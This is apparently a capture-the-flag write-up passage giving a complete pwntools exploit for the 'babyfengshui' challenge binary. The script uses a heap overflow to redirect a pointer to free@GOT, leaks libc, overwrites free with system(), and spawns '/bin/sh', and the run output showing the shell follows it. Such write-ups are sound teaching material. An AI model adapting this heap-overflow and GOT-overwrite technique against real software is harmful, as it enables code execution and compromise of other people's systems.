
Exploit code
from pwn import *

#context.log_level = 'debug'

def addUser(desc, name, text):
    """Drive menu action 0 ("add user") to completion on the global tube p.

    desc is the size requested for the description buffer, name the user
    name and text the description body.  The text length sent to the
    program is always derived from text itself, so this helper cannot by
    itself declare a length that disagrees with the content.
    """
    # Each step is "wait for this prompt, then answer it", in menu order.
    exchange = [
        ('Action: ', '0'),
        ('size of description: ', str(desc)),
        ('name: ', name),
        ('text length: ', str(len(text))),
        ('text: ', text),
    ]
    for prompt, answer in exchange:
        p.recvuntil(prompt)
        p.sendline(answer)

def delUser(idx):
    """Drive menu action 1 ("delete user") for the user at index idx.

    Uses the module-level tube p.  Deleting a user frees its buffers, which
    the exploit relies on both for heap shaping and for the final
    free() -> system() trigger.
    """
    for prompt, answer in (('Action: ', '1'), ('index: ', str(idx))):
        p.recvuntil(prompt)
        p.sendline(answer)

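def displayUser(idx):
    """Drive menu action 2 ("display user") and return the first 4 bytes of
    the printed description, using the module-level tube p.

    Once the heap overflow has redirected user idx's description pointer at
    a GOT entry, those 4 bytes are the little-endian pointer stored there.

    Read exactly 4 bytes with recvn() rather than recvline()[:4]: a 0x0a
    byte inside the leaked pointer would otherwise terminate the "line"
    early and hand back a truncated leak (and u32() on fewer than 4 bytes
    raises).  Whatever follows the 4 bytes stays in the tube and is skipped
    by the next recvuntil('Action: ').  The target appears to print the
    description as a C string, so a null byte inside the pointer would still
    cut the program's own output short; nothing here can recover that case.
    """
    p.recvuntil('Action: ')
    p.sendline('2')
    p.recvuntil('index:')
    p.sendline(str(idx))
    p.recvuntil('description: ')
    return p.recvn(4)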

def updateDesc(idx,size,text):
    """Drive menu action 3 ("update description") for user idx on the
    global tube p.

    size is sent verbatim as the declared text length and text as the new
    content; unlike addUser the two are not tied together, so a caller may
    declare a length that differs from len(text).
    """
    steps = (
        ('Action: ', '3'),
        ('index: ', str(idx)),
        ('text length: ', str(size)),
        ('text: ', text),
    )
    for prompt, answer in steps:
        p.recvuntil(prompt)
        p.sendline(answer)

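p = process('./babyfengshui')
elf = ELF('./babyfengshui')
# The libc path is host-specific; the offsets below are only valid if this
# is the libc the target process actually loaded.
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')

# Resolve free@GOT from the binary's relocations instead of hard-coding
# 0x804b010, so the script survives a rebuild that shifts the GOT.
free_got = elf.got['free']

# Heap feng shui: two filler users, then a third whose description is
# '/bin/sh' so that a later free(description) becomes system('/bin/sh').
addUser(10,'A'*10,'B'*10)
addUser(10,'A'*10,'B'*10)
addUser(len('/bin/sh'),'/bin/sh','/bin/sh')

# free() user 0's buffers so the next, larger allocation lands in that region.
delUser(0)

# Heap overflow: 152 bytes of filler reach user 1's description pointer and
# replace it with the address of free@GOT.  The 152 offset is specific to
# this binary's chunk layout; re-derive it if the binary changes.
addUser(120, 'HeapOverflow', 'A'*152+p32(free_got))

# Leak libc: displaying user 1 now prints the contents of free@GOT.
libcAddr = displayUser(1)

free = u32(libcAddr)
libcBase = free - libc.sym['free']
system = libcBase + libc.sym['system']

# A libc base is page aligned.  Anything else means the leak was garbage
# (wrong libc, bad offset, truncated read) and writing it into the GOT
# would only crash the target, so stop here instead.  log.error() raises.
if libcBase & 0xfff:
    log.error('bad libc leak: free() = %#x' % free)

log.info('Libc base : '+hex(libcBase))
log.info('free() : '+hex(free))
log.info('system() : '+hex(system))

# Overwrite free@GOT with system(): exactly one 4-byte pointer.
updateDesc(1,4,p32(system))

# free(user 2's description) is now system('/bin/sh').
delUser(2)

# Hand the shell to the operator.
p.interactive()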
Get shell!
lazenca0x0@ubuntu:~/Exploit/HeapFensui$ python exploit.py 
[+] Starting local process './babyfengshui': pid 8750
[*] '/lib/i386-linux-gnu/libc-2.23.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Libc base : 0xf7d48000
[*] free() : 0xf7db8750
[*] system() : 0xf7d82940
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

References

...